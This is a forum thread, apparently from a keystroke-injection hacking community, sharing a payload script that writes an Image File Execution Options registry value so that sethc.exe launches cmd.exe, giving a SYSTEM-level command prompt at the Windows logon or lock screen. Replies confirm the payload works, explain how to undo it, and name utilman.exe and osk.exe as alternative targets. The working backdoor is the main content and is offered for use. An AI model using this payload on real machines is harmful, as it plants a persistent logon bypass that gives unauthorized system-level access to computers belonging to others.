Jump to content

Attacking Windows At The Logon Screen, Gaining Access To CMD With System Privileges.


Recommended Posts


First off i have posted this on github but i thought ide add it here as well as this is version 2.

This command prompt will close automatically due to the way this hack works (after about 3 minutes or so)

This hack does require pre work and does require administrator privileges to modify the registry and i am assuming that UAC is turned on.

Pre work
  • DELAY 400
  • DELAY 200
  • DELAY 750
  • STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f"
  • DELAY 750
  • DELAY 1000
  • ALT y

Left Alt + Left Shift + Print Screen to access the system prompt from anywhere on the machine including when the machine is logged out or locked.

Have fun guys.

Link to comment
Share on other sites

Thanks for sharing this payload it works perfectly. Is this payload permanent or can I just delete the sethc.exe folder in the registry without messing anything up?

you can just delete it and it will be back to normal.

I did the same thing as this payload except with utilman.exe (Utility Manager) instead of sethc.exe. I believe osk.exe (on screen keyboard) is also ran as SYSTEM on any windows machine, so would also work.

yeah you can use any of them but i prefer sethc as its nice and hidden and it has quite a long time out period.

Link to comment
Share on other sites

  • 8 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...